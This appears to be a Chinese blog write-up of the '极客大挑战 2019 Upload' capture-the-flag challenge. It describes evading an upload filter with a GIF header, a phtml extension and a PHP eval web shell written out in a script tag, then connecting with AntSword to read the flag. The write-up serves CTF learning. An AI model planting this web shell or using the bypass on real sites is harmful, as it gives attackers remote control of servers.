[...]"/>

[极客大挑战 2019]Upload

进入题目

image 2 - [极客大挑战 2019]Upload

尝试上传php文件

image 3 - [极客大挑战 2019]Upload
image 4 - [极客大挑战 2019]Upload

尝试上传图片马

image 5 - [极客大挑战 2019]Upload
image 6 - [极客大挑战 2019]Upload

白名单 文件内容不能含<?

构造绕过

文件内容

<script language="php">eval($_POST['shell']);</script>

通过burp修改文件后缀为html**{phtml:是一个嵌入了PHP脚本的html页面。}

image 8 - [极客大挑战 2019]Upload
image 9 - [极客大挑战 2019]Upload

可能需要加一个gif头

image 10 - [极客大挑战 2019]Upload

上传成功

image 12 - [极客大挑战 2019]Upload

盲猜目录是upload/1.jpg

使用蚁剑连接

得到flag

image 13 - [极客大挑战 2019]Upload

[极客大挑战 2019]Http

上一篇

[RoarCTF 2019]Easy Calc

下一篇
评论
发表评论 说点什么
还没有评论
99